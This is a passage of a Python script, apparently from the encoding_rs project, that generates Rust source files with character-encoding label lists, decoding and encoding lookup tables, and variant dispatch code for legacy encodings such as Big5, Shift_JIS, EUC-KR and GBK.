28604: "ISO-8859-14",
28605: "ISO-8859-15",
28606: "ISO-8859-16",
38598: "ISO-8859-8-I",
50221: "ISO-2022-JP",
54936: "gb18030",
65001: "UTF-8",
}
code_pages_by_encoding = {}
for code_page, encoding in encodings_by_code_page.iteritems():
code_pages_by_encoding[encoding] = code_page
encoding_by_alias_code_page = {
951: "Big5",
10007: "x-mac-cyrillic",
20936: "GBK",
20949: "EUC-KR",
21010: "UTF-16LE",
28591: "windows-1252",
28599: "windows-1254",
28601: "windows-874",
50220: "ISO-2022-JP",
50222: "ISO-2022-JP",
50225: "replacement",
50227: "replacement",
51949: "EUC-JP",
51936: "GBK",
51949: "EUC-KR",
52936: "replacement",
}
code_pages = []
for name in encodings_by_code_page_frequency:
code_pages.append(code_pages_by_encoding[name])
encodings_by_code_page.update(encoding_by_alias_code_page)
temp_keys = encodings_by_code_page.keys()
temp_keys.sort()
for code_page in temp_keys:
if not code_page in code_pages:
code_pages.append(code_page)
start_of_longest_run_in_single_byte = {
"IBM866": 96,
"windows-874": 33,
"windows-1250": 92,
"windows-1251": 64,
"windows-1252": 32,
"windows-1253": 83,
"windows-1254": 95,
"windows-1255": 96,
"windows-1256": 65,
"windows-1257": 95,
"windows-1258": 95,
"macintosh": 106,
"x-mac-cyrillic": 96,
"KOI8-R": 64,
"KOI8-U": 64,
"ISO-8859-2": 95,
"ISO-8859-3": 95,
"ISO-8859-4": 95,
"ISO-8859-5": 46,
"ISO-8859-6": 65,
"ISO-8859-7": 83,
"ISO-8859-8": 96,
"ISO-8859-10": 90,
"ISO-8859-13": 95,
"ISO-8859-14": 95,
"ISO-8859-15": 63,
"ISO-8859-16": 95,
}
# Partition encodings into the single-byte group and everything else, and
# collect every (label, preferred name) pair from encodings.json.
for group in data:
    if group["heading"] == "Legacy single-byte encodings":
        single_byte = group["encodings"]
    else:
        multi_byte.extend(group["encodings"])
    for encoding in group["encodings"]:
        preferred.append(encoding["name"])
        for label in encoding["labels"]:
            labels.append(Label(label, encoding["name"]))
for name in preferred:
    dom.append(to_dom_name(name))
# Sort names alphabetically; labels and DOM names use the shortest-first,
# back-to-front ordering (cmp_from_end / Label.__cmp__).
preferred.sort()
labels.sort()
dom.sort(cmp=cmp_from_end)
# Find the longest label and the longest name; the label length is emitted
# into the generated Rust as LONGEST_LABEL_LENGTH.
longest_label_length = 0
longest_name_length = 0
longest_label = None
longest_name = None
for name in preferred:
    if len(name) > longest_name_length:
        longest_name_length = len(name)
        longest_name = name
for label in labels:
    if len(label.label) > longest_label_length:
        longest_label_length = len(label.label)
        longest_label = label.label
def longest_run_for_single_byte(name):
    """Measure a run of consecutive code points in a single-byte index.

    The starting byte offset comes from the hand-maintained
    start_of_longest_run_in_single_byte table; the run extends while each
    successive index entry is exactly one above the previous.  Returns
    (first code point of the run, starting byte offset, run length).
    """
    # ISO-8859-8-I shares the ISO-8859-8 index.
    if name == u"ISO-8859-8-I":
        name = u"ISO-8859-8"
    index = indexes[name.lower()]
    run_byte_offset = start_of_longest_run_in_single_byte[name]
    run_bmp_offset = index[run_byte_offset]
    run_length = 1
    for i in range(run_byte_offset + 1, len(index)):
        if index[i] != index[i - 1] + 1:
            break
        run_length += 1
    return (run_bmp_offset, run_byte_offset, run_length)
def is_single_byte(name):
    """True iff `name` is one of the legacy single-byte encodings."""
    return any(encoding["name"] == name for encoding in single_byte)
def read_non_generated(path):
    """Split a partially generated source file around its generated region.

    Returns a (prefix, suffix) pair: everything up to and including the
    BEGIN marker, and everything from the END marker onwards.  Exits the
    process if either marker is missing, since regenerating into such a
    file would clobber hand-written code.
    """
    # `with` guarantees the handle is closed even if read() raises; the
    # original open/read/close sequence leaked the handle on error.
    with open(path, "r") as partially_generated_file:
        full = partially_generated_file.read()
    generated_begin = "// BEGIN GENERATED CODE. PLEASE DO NOT EDIT."
    generated_end = "// END GENERATED CODE"
    generated_begin_index = full.find(generated_begin)
    if generated_begin_index < 0:
        sys.stderr.write("Can't find generated code start marker in %s. Exiting.\n" % path)
        sys.exit(-1)
    generated_end_index = full.find(generated_end)
    if generated_end_index < 0:
        sys.stderr.write("Can't find generated code end marker in %s. Exiting.\n" % path)
        sys.exit(-1)
    return (full[0:generated_begin_index + len(generated_begin)],
            full[generated_end_index:])
(lib_rs_begin, lib_rs_end) = read_non_generated("src/lib.rs")
label_file = open("src/lib.rs", "w")
label_file.write(lib_rs_begin)
label_file.write("""
// Instead, please regenerate using generate-encoding-data.py
const LONGEST_LABEL_LENGTH: usize = %d; // %s
""" % (longest_label_length, longest_label))
for name in preferred:
variant = None
if is_single_byte(name):
(run_bmp_offset, run_byte_offset, run_length) = longest_run_for_single_byte(name)
variant = "SingleByte(&data::SINGLE_BYTE_DATA.%s, 0x%04X, %d, %d)" % (to_snake_name(u"iso-8859-8" if name == u"ISO-8859-8-I" else name), run_bmp_offset, run_byte_offset, run_length)
else:
variant = to_camel_name(name)
docfile = open("doc/%s.txt" % name, "r")
doctext = docfile.read()
docfile.close()
label_file.write('''/// The initializer for the [%s](static.%s.html) encoding.
///
/// For use only for taking the address of this form when
/// Rust prohibits the use of the non-`_INIT` form directly,
/// such as in initializers of other `static`s. If in doubt,
/// use the corresponding non-`_INIT` reference-typed `static`.
///
/// This part of the public API will go away if Rust changes
/// to make the referent of `pub const FOO: &'static Encoding`
/// unique cross-crate or if Rust starts allowing static arrays
/// to be initialized with `pub static FOO: &'static Encoding`
/// items.
pub static %s_INIT: Encoding = Encoding {
name: "%s",
variant: VariantEncoding::%s,
};
/// The %s encoding.
///
%s///
/// This will change from `static` to `const` if Rust changes
/// to make the referent of `pub const FOO: &'static Encoding`
/// unique cross-crate, so don't take the address of this
/// `static`.
pub static %s: &'static Encoding = &%s_INIT;
''' % (to_dom_name(name), to_constant_name(name), to_constant_name(name), to_dom_name(name), variant, to_dom_name(name), doctext, to_constant_name(name), to_constant_name(name)))
label_file.write("""static LABELS_SORTED: [&'static str; %d] = [
""" % len(labels))
for label in labels:
label_file.write('''"%s",\n''' % label.label)
label_file.write("""];
static ENCODINGS_IN_LABEL_SORT: [&'static Encoding; %d] = [
""" % len(labels))
for label in labels:
label_file.write('''&%s_INIT,\n''' % to_constant_name(label.preferred))
label_file.write('''];
''')
label_file.write(lib_rs_end)
label_file.close()
label_test_file = open("src/test_labels_names.rs", "w")
label_test_file.write('''// Any copyright to the test code below this comment is dedicated to the
// Public Domain. http://creativecommons.org/publicdomain/zero/1.0/
// THIS IS A GENERATED FILE. PLEASE DO NOT EDIT.
// Instead, please regenerate using generate-encoding-data.py
use super::*;
#[test]
fn test_all_labels() {
''')
for label in labels:
label_test_file.write('''assert_eq!(Encoding::for_label(b"%s"), Some(%s));\n''' % (label.label, to_constant_name(label.preferred)))
label_test_file.write('''}
''')
label_test_file.close()
def null_to_zero(code_point):
    """Map None (an unmapped index slot) to 0; pass real code points through."""
    return code_point if code_point else 0
(data_rs_begin, data_rs_end) = read_non_generated("src/data.rs")
data_file = open("src/data.rs", "w")
data_file.write(data_rs_begin)
data_file.write('''
// Instead, please regenerate using generate-encoding-data.py
#[repr(align(64))] // Align to cache lines
pub struct SingleByteData {
''')
for encoding in single_byte:
name = encoding["name"]
if name == u"ISO-8859-8-I":
continue
data_file.write(''' pub %s: [u16; 128],
''' % to_snake_name(name))
data_file.write('''}
pub static SINGLE_BYTE_DATA: SingleByteData = SingleByteData {
''')
for encoding in single_byte:
name = encoding["name"]
if name == u"ISO-8859-8-I":
continue
data_file.write(''' %s: [
''' % to_snake_name(name))
for code_point in indexes[name.lower()]:
data_file.write('0x%04X,\n' % null_to_zero(code_point))
data_file.write('''],
''')
data_file.write('''};
''')
index = indexes["big5"]
astralness = []
low_bits = []
for code_point in index[942:19782]:
if code_point:
astralness.append(1 if code_point > 0xFFFF else 0)
low_bits.append(code_point & 0xFFFF)
else:
astralness.append(0)
low_bits.append(0)
for j in xrange(32 - (len(astralness) % 32)):
astralness.append(0)
data_file.write('''#[cfg_attr(feature = "cargo-clippy", allow(unreadable_literal))]
static BIG5_ASTRALNESS: [u32; %d] = [
''' % (len(astralness) / 32))
i = 0
while i < len(astralness):
accu = 0
for j in xrange(32):
accu |= astralness[i + j] << j
data_file.write('0x%08X,\n' % accu)
i += 32
data_file.write('''];
''')
static_u16_table("BIG5_LOW_BITS", low_bits)
level1_hanzi_index = index[5495:10896]
level1_hanzi_pairs = []
for i in xrange(len(level1_hanzi_index)):
hanzi_lead = (i / 157) + 0xA4
hanzi_trail = (i % 157)
hanzi_trail += 0x40 if hanzi_trail < 0x3F else 0x62
level1_hanzi_pairs.append((level1_hanzi_index[i], (hanzi_lead, hanzi_trail)))
level1_hanzi_pairs.append((0x4E5A, (0xC8, 0x7B)))
level1_hanzi_pairs.append((0x5202, (0xC8, 0x7D)))
level1_hanzi_pairs.append((0x9FB0, (0xC8, 0xA1)))
level1_hanzi_pairs.append((0x5188, (0xC8, 0xA2)))
level1_hanzi_pairs.append((0x9FB1, (0xC8, 0xA3)))
level1_hanzi_pairs.sort(key=lambda x: x[0])
static_u16_table_from_indexable("BIG5_LEVEL1_HANZI_CODE_POINTS", level1_hanzi_pairs, 0, "big5-hanzi-encode")
static_u8_pair_table_from_indexable("BIG5_LEVEL1_HANZI_BYTES", level1_hanzi_pairs, 1, "big5-hanzi-encode")
big5_unified_ideograph_bytes = [None] * (0x9FCC - 0x4E00)
for row in xrange(0x7E - 0x20):
for column in xrange(157):
pointer = 5024 + column + (row * 157)
code_point = index[pointer]
if code_point and code_point >= 0x4E00 and code_point <= 0x9FCB:
unified_offset = code_point - 0x4E00
unified_lead = 0xA1 + row
unified_trail = (0x40 if column < 0x3F else 0x62) + column
if code_point == 0x5341 or code_point == 0x5345 or not big5_unified_ideograph_bytes[unified_offset]:
big5_unified_ideograph_bytes[unified_offset] = (unified_lead, unified_trail)
static_u8_pair_table("BIG5_UNIFIED_IDEOGRAPH_BYTES", big5_unified_ideograph_bytes, "fast-big5-hanzi-encode")
index = indexes["jis0208"]
static_u16_table("JIS0208_LEVEL1_KANJI", index[1410:4375])
static_u16_table("JIS0208_LEVEL2_AND_ADDITIONAL_KANJI", index[4418:7808])
static_u16_table("IBM_KANJI", index[8272:8632])
if index[8272:8632] != index[10744:11104]:
raise Error()
symbol_index = []
symbol_triples = []
pointers_to_scan = [
(0, 188),
(658, 691),
(1159, 1221),
]
in_run = False
run_start_pointer = 0
run_start_array_index = 0
for (start, end) in pointers_to_scan:
for i in range(start, end):
code_point = index[i]
if in_run:
if code_point:
symbol_index.append(code_point)
else:
symbol_triples.append(run_start_pointer)
symbol_triples.append(i - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
else:
if code_point:
in_run = True
run_start_pointer = i
run_start_array_index = len(symbol_index)
symbol_index.append(code_point)
if in_run:
symbol_triples.append(run_start_pointer)
symbol_triples.append(end - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
if in_run:
raise Error()
run_start_array_index = len(symbol_index)
symbol_index.extend(index[10736:10744])
symbol_triples.append(10736)
symbol_triples.append(8)
symbol_triples.append(run_start_array_index)
symbol_triples.append(8644)
symbol_triples.append(4)
symbol_triples.append(run_start_array_index)
static_u16_table("JIS0208_SYMBOLS", symbol_index)
static_u16_table("JIS0208_SYMBOL_TRIPLES", symbol_triples)
data_file.write('''const IBM_SYMBOL_START: usize = %d;''' % (run_start_array_index + 1))
data_file.write('''const IBM_SYMBOL_END: usize = %d;''' % (run_start_array_index + 4))
data_file.write('''const IBM_SYMBOL_POINTER_START: usize = %d;''' % 8645)
range_triples = []
pointers_to_scan = [
(188, 281),
(470, 657),
(1128, 1159),
(8634, 8644),
(10716, 10736),
]
in_run = False
run_start_pointer = 0
run_start_code_point = 0
previous_code_point = 0
for (start, end) in pointers_to_scan:
for i in range(start, end):
code_point = index[i]
if in_run:
if code_point:
if previous_code_point + 1 != code_point:
range_triples.append(run_start_pointer)
range_triples.append(i - run_start_pointer)
range_triples.append(run_start_code_point)
run_start_pointer = i
run_start_code_point = code_point
previous_code_point = code_point
else:
range_triples.append(run_start_pointer)
range_triples.append(i - run_start_pointer)
range_triples.append(run_start_code_point)
run_start_pointer = 0
run_start_code_point = 0
previous_code_point = 0
in_run = False
else:
if code_point:
in_run = True
run_start_pointer = i
run_start_code_point = code_point
previous_code_point = code_point
if in_run:
range_triples.append(run_start_pointer)
range_triples.append(end - run_start_pointer)
range_triples.append(run_start_code_point)
run_start_pointer = 0
run_start_code_point = 0
previous_code_point = 0
in_run = False
if in_run:
raise Error()
static_u16_table("JIS0208_RANGE_TRIPLES", range_triples)
level1_kanji_index = index[1410:4375]
level1_kanji_pairs = []
for i in xrange(len(level1_kanji_index)):
pointer = 1410 + i
(lead, trail) = divmod(pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
level1_kanji_pairs.append((level1_kanji_index[i], (lead, trail)))
level1_kanji_pairs.sort(key=lambda x: x[0])
static_u16_table_from_indexable("JIS0208_LEVEL1_KANJI_CODE_POINTS", level1_kanji_pairs, 0, "kanji-encode")
static_u8_pair_table_from_indexable("JIS0208_LEVEL1_KANJI_SHIFT_JIS_BYTES", level1_kanji_pairs, 1, "kanji-encode")
kanji_bytes = [None] * (0x9FA1 - 0x4E00)
for pointer in xrange(len(index)):
code_point = index[pointer]
if code_point and code_point >= 0x4E00 and code_point <= 0x9FA0:
(lead, trail) = divmod(pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
if pointer >= 8272:
lead = lead & 0x7F
kanji_bytes[code_point - 0x4E00] = (lead, trail)
static_u8_pair_table("JIS0208_KANJI_BYTES", kanji_bytes, "fast-kanji-encode")
half_width_index = indexes["iso-2022-jp-katakana"]
data_file.write('''pub static ISO_2022_JP_HALF_WIDTH_TRAIL: [u8; %d] = [
''' % len(half_width_index))
for i in xrange(len(half_width_index)):
code_point = half_width_index[i]
pointer = index.index(code_point)
trail = pointer % 94 + 0x21
data_file.write('0x%02X,\n' % trail)
data_file.write('''];
''')
index = indexes["euc-kr"]
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x20):
for column in xrange(190):
i = column + (row * 190)
if (column >= 0x1A and column < 0x20) or (column >= 0x3A and column < 0x40):
continue
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
adjustment = 0
if column >= 0x40:
adjustment = 12
elif column >= 0x20:
adjustment = 6
pointers.append(column - adjustment + (row * (190 - 12)))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("CP949_TOP_HANGUL_POINTERS", pointers)
static_u16_table("CP949_TOP_HANGUL_OFFSETS", offsets)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x46 - 0x20):
for column in xrange(190 - 94):
i = 6080 + column + (row * 190)
if (column >= 0x1A and column < 0x20) or (column >= 0x3A and column < 0x40):
continue
if i > 13127:
break
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
adjustment = 0
if column >= 0x40:
adjustment = 12
elif column >= 0x20:
adjustment = 6
pointers.append(column - adjustment + (row * (190 - 94 - 12)))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("CP949_LEFT_HANGUL_POINTERS", pointers)
static_u16_table("CP949_LEFT_HANGUL_OFFSETS", offsets)
hangul_index = []
previous_code_point = 0
for row in xrange(0x48 - 0x2F):
for column in xrange(94):
code_point = index[9026 + column + (row * 190)]
if previous_code_point >= code_point:
raise Error()
hangul_index.append(code_point)
previous_code_point = code_point
static_u16_table("KSX1001_HANGUL", hangul_index)
hanja_index = []
for row in xrange(0x7D - 0x49):
for column in xrange(94):
hanja_index.append(index[13966 + column + (row * 190)])
static_u16_table("KSX1001_HANJA", hanja_index)
symbol_index = []
for i in range(6176, 6270):
symbol_index.append(index[i])
for i in range(6366, 6437):
symbol_index.append(index[i])
static_u16_table("KSX1001_SYMBOLS", symbol_index)
subindex = []
for i in range(7506, 7521):
subindex.append(null_to_zero(index[i]))
static_u16_table("KSX1001_UPPERCASE", subindex)
subindex = []
for i in range(7696, 7712):
subindex.append(index[i])
static_u16_table("KSX1001_LOWERCASE", subindex)
subindex = []
for i in range(7126, 7194):
subindex.append(index[i])
static_u16_table("KSX1001_BOX", subindex)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(10):
for column in xrange(94):
i = 6556 + column + (row * 190)
code_point = index[i]
if (i >= 6946 and i <= 6950):
code_point = i - 6946
elif (i >= 6961 and i <= 6967):
code_point = i - 6961
elif (i >= 6992 and i <= 6999):
code_point = i - 6992
elif (i >= 7024 and i <= 7029):
code_point = i - 7024
elif (i >= 7126 and i <= 7219):
code_point = i - 7126
elif (i >= 7395 and i <= 7409):
code_point = i - 7395
elif (i >= 7506 and i <= 7521):
code_point = i - 7506
elif (i >= 7696 and i <= 7711):
code_point = i - 7696
elif (i >= 7969 and i <= 7979):
code_point = i - 7969
elif (i >= 8162 and i <= 8169):
code_point = i - 8162
elif (i >= 8299 and i <= 8313):
code_point = i - 8299
elif (i >= 8347 and i <= 8359):
code_point = i - 8347
if code_point - previous_code_point != 1:
pointers.append(column + (row * 94))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("KSX1001_OTHER_POINTERS", pointers)
static_u16_table("KSX1001_OTHER_UNSORTED_OFFSETS", offsets[:-1])
hangul_bytes = [None] * (0xD7A4 - 0xAC00)
hanja_unified_bytes = [None] * (0x9F9D - 0x4E00)
hanja_compatibility_bytes = [None] * (0xFA0C - 0xF900)
for row in xrange(0x7D):
for column in xrange(190):
pointer = column + (row * 190)
code_point = index[pointer]
if code_point:
lead = 0x81 + row
trail = 0x41 + column
if code_point >= 0xAC00 and code_point < 0xD7A4:
hangul_bytes[code_point - 0xAC00] = (lead, trail)
elif code_point >= 0x4E00 and code_point < 0x9F9D:
hanja_unified_bytes[code_point - 0x4E00] = (lead, trail)
elif code_point >= 0xF900 and code_point < 0xFA0C:
hanja_compatibility_bytes[code_point - 0xF900] = (lead, trail)
static_u8_pair_table("CP949_HANGUL_BYTES", hangul_bytes, "fast-hangul-encode")
static_u8_pair_table("KSX1001_UNIFIED_HANJA_BYTES", hanja_unified_bytes, "fast-hanja-encode")
static_u8_pair_table("KSX1001_COMPATIBILITY_HANJA_BYTES", hanja_compatibility_bytes, "fast-hanja-encode")
index = indexes["jis0212"]
static_u16_table("JIS0212_KANJI", index[1410:7211])
symbol_index = []
symbol_triples = []
pointers_to_scan = [
(0, 596),
(608, 644),
(656, 1409),
]
in_run = False
run_start_pointer = 0
run_start_array_index = 0
for (start, end) in pointers_to_scan:
for i in range(start, end):
code_point = index[i]
if in_run:
if code_point:
symbol_index.append(code_point)
elif index[i + 1]:
symbol_index.append(0)
else:
symbol_triples.append(run_start_pointer)
symbol_triples.append(i - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
else:
if code_point:
in_run = True
run_start_pointer = i
run_start_array_index = len(symbol_index)
symbol_index.append(code_point)
if in_run:
symbol_triples.append(run_start_pointer)
symbol_triples.append(end - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
if in_run:
raise Error()
static_u16_table("JIS0212_ACCENTED", symbol_index)
static_u16_table("JIS0212_ACCENTED_TRIPLES", symbol_triples)
index = indexes["gb18030"]
pointers = []
offsets = []
previous_code_point = 0
for i in xrange(6080):
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
pointers.append(i)
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("GBK_TOP_IDEOGRAPH_POINTERS", pointers)
static_u16_table("GBK_TOP_IDEOGRAPH_OFFSETS", offsets)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x7D - 0x29):
for column in xrange(190 - 94):
i = 7790 + column + (row * 190)
if i > 23650:
break
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
pointers.append(column + (row * (190 - 94)))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("GBK_LEFT_IDEOGRAPH_POINTERS", pointers)
static_u16_table("GBK_LEFT_IDEOGRAPH_OFFSETS", offsets)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x29 - 0x20):
for column in xrange(190 - 94):
i = 6080 + column + (row * 190)
code_point = index[i]
if code_point - previous_code_point != 1:
pointers.append(column + (row * (190 - 94)))
offsets.append(code_point)
previous_code_point = code_point
pointers.append((190 - 94) * (0x29 - 0x20))
static_u16_table("GBK_OTHER_POINTERS", pointers)
static_u16_table("GBK_OTHER_UNSORTED_OFFSETS", offsets)
bottom_index = []
for i in range(23651, 23656):
bottom_index.append(index[i])
for i in range(23750, 23846):
bottom_index.append(index[i])
static_u16_table("GBK_BOTTOM", bottom_index)
hanzi_index = []
for row in xrange(0x77 - 0x2F):
for column in xrange(94):
hanzi_index.append(index[9026 + column + (row * 190)])
static_u16_table("GB2312_HANZI", hanzi_index)
symbol_index = []
for i in xrange(94):
symbol_index.append(index[6176 + i])
static_u16_table("GB2312_SYMBOLS", symbol_index)
symbol_index = []
for i in xrange(22):
symbol_index.append(index[7189 + i])
static_u16_table("GB2312_SYMBOLS_AFTER_GREEK", symbol_index)
pinyin_index = []
for i in xrange(32):
pinyin_index.append(index[7506 + i])
static_u16_table("GB2312_PINYIN", pinyin_index)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(14):
for column in xrange(94):
i = 6366 + column + (row * 190)
code_point = index[i]
if (i >= 7189 and i < 7189 + 22):
code_point = i - 7189
elif (i >= 7506 and i < 7506 + 32):
code_point = i - 7506
if code_point - previous_code_point != 1:
pointers.append(column + (row * 94))
offsets.append(code_point)
previous_code_point = code_point
pointers.append(14 * 94)
static_u16_table("GB2312_OTHER_POINTERS", pointers)
static_u16_table("GB2312_OTHER_UNSORTED_OFFSETS", offsets)
pointers = []
offsets = []
for pair in indexes["gb18030-ranges"]:
if pair[1] == 0x10000:
break
pointers.append(pair[0])
offsets.append(pair[1])
static_u16_table("GB18030_RANGE_POINTERS", pointers)
static_u16_table("GB18030_RANGE_OFFSETS", offsets)
level1_hanzi_index = hanzi_index[:(94 * (0xD8 - 0xB0) - 5)]
level1_hanzi_pairs = []
for i in xrange(len(level1_hanzi_index)):
hanzi_lead = (i / 94) + 0xB0
hanzi_trail = (i % 94) + 0xA1
level1_hanzi_pairs.append((level1_hanzi_index[i], (hanzi_lead, hanzi_trail)))
level1_hanzi_pairs.sort(key=lambda x: x[0])
static_u16_table_from_indexable("GB2312_LEVEL1_HANZI_CODE_POINTS", level1_hanzi_pairs, 0, "gb-hanzi-encode")
static_u8_pair_table_from_indexable("GB2312_LEVEL1_HANZI_BYTES", level1_hanzi_pairs, 1, "gb-hanzi-encode")
hanzi_bytes = [None] * (0x9FA7 - 0x4E00)
for row in xrange(126):
for column in xrange(190):
pointer = column + (row * 190)
code_point = index[pointer]
if code_point and code_point >= 0x4E00 and code_point <= 0x9FA6:
hanzi_lead = 0x81 + row
hanzi_trail = column + (0x40 if column < 0x3F else 0x41)
hanzi_bytes[code_point - 0x4E00] = (hanzi_lead, hanzi_trail)
static_u8_pair_table("GBK_HANZI_BYTES", hanzi_bytes, "fast-gb-hanzi-encode")
data_file.write(data_rs_end)
data_file.close()
variant_file = open("src/variant.rs", "w")
variant_file.write('''// Copyright Mozilla Foundation. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// https://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or https://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// THIS IS A GENERATED FILE. PLEASE DO NOT EDIT.
// Instead, please regenerate using generate-encoding-data.py
//! This module provides enums that wrap the various decoders and encoders.
//! The purpose is to make `Decoder` and `Encoder` `Sized` by writing the
//! dispatch explicitly for a finite set of specialized decoders and encoders.
//! Unfortunately, this means the compiler doesn't generate the dispatch code
//! and it has to be written here instead.
//!
//! The purpose of making `Decoder` and `Encoder` `Sized` is to allow stack
//! allocation in Rust code, including the convenience methods on `Encoding`.
''')
encoding_variants = [u"single-byte",]
for encoding in multi_byte:
if encoding["name"] in [u"UTF-16LE", u"UTF-16BE"]:
continue
else:
encoding_variants.append(encoding["name"])
encoding_variants.append(u"UTF-16")
decoder_variants = []
for variant in encoding_variants:
if variant == u"GBK":
continue
decoder_variants.append(variant)
encoder_variants = []
for variant in encoding_variants:
if variant in [u"replacement", u"GBK", u"UTF-16"]:
continue
encoder_variants.append(variant)
for variant in decoder_variants:
variant_file.write("use %s::*;\n" % to_snake_name(variant))
variant_file.write('''use super::*;
pub enum VariantDecoder {
''')
for variant in decoder_variants:
variant_file.write(" %s(%sDecoder),\n" % (to_camel_name(variant), to_camel_name(variant)))
variant_file.write('''}
impl VariantDecoder {
''')
def write_variant_method(name, mut, arg_list, ret, variants, excludes, kind):
    """Write a dispatch method `name` of the Variant<kind> enum to variant_file.

    Emits a Rust method that matches on every variant and forwards the call
    to the wrapped value; variants listed in `excludes` get an empty arm.
    `mut` selects `&mut self` / `ref mut` receivers, `arg_list` is a
    sequence of (argument name, argument type) pairs, and `ret` is the
    return type or a falsy value for no return type.
    """
    receiver = "mut self" if mut else "self"
    variant_file.write("pub fn %s(&%s" % (name, receiver))
    for (arg_name, arg_type) in arg_list:
        variant_file.write(", %s: %s" % (arg_name, arg_type))
    variant_file.write(")")
    if ret:
        variant_file.write(" -> %s" % ret)
    variant_file.write(" {\nmatch *self {\n")
    binding = "ref mut " if mut else "ref "
    for variant in variants:
        variant_file.write("Variant%s::%s(%s" % (kind, to_camel_name(variant), binding))
        if variant in excludes:
            # Excluded variants get a unit arm and no trailing newline,
            # matching the original emitter byte for byte.
            variant_file.write("v) => (),")
        else:
            variant_file.write("v) => v.%s(" % name)
            variant_file.write(", ".join(arg[0] for arg in arg_list))
            variant_file.write("),\n")
    variant_file.write("}\n}\n\n")
write_variant_method("max_utf16_buffer_length", False, [("byte_length", "usize")], "Option<usize>", decoder_variants, [], "Decoder")
write_variant_method("max_utf8_buffer_length_without_replacement", False, [("byte_length", "usize")], "Option<usize>", decoder_variants, [], "Decoder")
write_variant_method("max_utf8_buffer_length", False, [("byte_length", "usize")], "Option<usize>", decoder_variants, [], "Decoder")
write_variant_method("decode_to_utf16_raw", True, [("src", "&[u8]"),
("dst", "&mut [u16]"),
("last", "bool")], "(DecoderResult, usize, usize)", decoder_variants, [], "Decoder")
write_variant_method("decode_to_utf8_raw", True, [("src", "&[u8]"),
("dst", "&mut [u8]"),
("last", "bool")], "(DecoderResult, usize, usize)", decoder_variants, [], "Decoder")
variant_file.write('''
pub fn latin1_byte_compatible_up_to(&self, buffer: &[u8]) -> Option<usize> {
match *self {
VariantDecoder::SingleByte(ref v) => {
return Some(v.latin1_byte_compatible_up_to(buffer));
}
VariantDecoder::Utf8(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::Gb18030(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::Big5(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::EucJp(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::Iso2022Jp(ref v) => {
if v.in_neutral_state() {
return Some(Encoding::iso_2022_jp_ascii_valid_up_to(buffer));
}
return None;
}
VariantDecoder::ShiftJis(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::EucKr(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::UserDefined(_) => {}
VariantDecoder::Replacement(_) | VariantDecoder::Utf16(_) => {
return None;
}
};
Some(Encoding::ascii_valid_up_to(buffer))
}
}
pub enum VariantEncoder {
''')
for variant in encoder_variants:
variant_file.write(" %s(%sEncoder),\n" % (to_camel_name(variant), to_camel_name(variant)))
variant_file.write('''}
impl VariantEncoder {
pub fn has_pending_state(&self) -> bool {
match *self {
VariantEncoder::Iso2022Jp(ref v) => {
v.has_pending_state()
}
_ => false,
}
}
''')
write_variant_method("max_buffer_length_from_utf16_without_replacement", False, [("u16_length", "usize")], "Option<usize>", encoder_variants, [], "Encoder")
write_variant_method("max_buffer_length_from_utf8_without_replacement", False, [("byte_length", "usize")], "Option<usize>", encoder_variants, [], "Encoder")
write_variant_method("encode_from_utf16_raw", True, [("src", "&[u16]"),
("dst", "&mut [u8]"),
("last", "bool")], "(EncoderResult, usize, usize)", encoder_variants, [], "Encoder")
write_variant_method("encode_from_utf8_raw", True, [("src", "&str"),
("dst", "&mut [u8]"),
("last", "bool")], "(EncoderResult, usize, usize)", encoder_variants, [], "Encoder")
variant_file.write('''}
pub enum VariantEncoding {
SingleByte(&'static [u16; 128], u16, u8, u8),''')
for encoding in multi_byte:
variant_file.write("%s,\n" % to_camel_name(encoding["name"]))
variant_file.write('''}
impl VariantEncoding {
pub fn new_variant_decoder(&self) -> VariantDecoder {
match *self {
VariantEncoding::SingleByte(table, _, _, _) => SingleByteDecoder::new(table),
VariantEncoding::Utf8 => Utf8Decoder::new(),
VariantEncoding::Gbk | VariantEncoding::Gb18030 => Gb18030Decoder::new(),
VariantEncoding::Big5 => Big5Decoder::new(),
VariantEncoding::EucJp => EucJpDecoder::new(),
VariantEncoding::Iso2022Jp => Iso2022JpDecoder::new(),
VariantEncoding::ShiftJis => ShiftJisDecoder::new(),
VariantEncoding::EucKr => EucKrDecoder::new(),
VariantEncoding::Replacement => ReplacementDecoder::new(),
VariantEncoding::UserDefined => UserDefinedDecoder::new(),
VariantEncoding::Utf16Be => Utf16Decoder::new(true),
VariantEncoding::Utf16Le => Utf16Decoder::new(false),
}
}
pub fn new_encoder(&self, encoding: &'static Encoding) -> Encoder {
match *self {
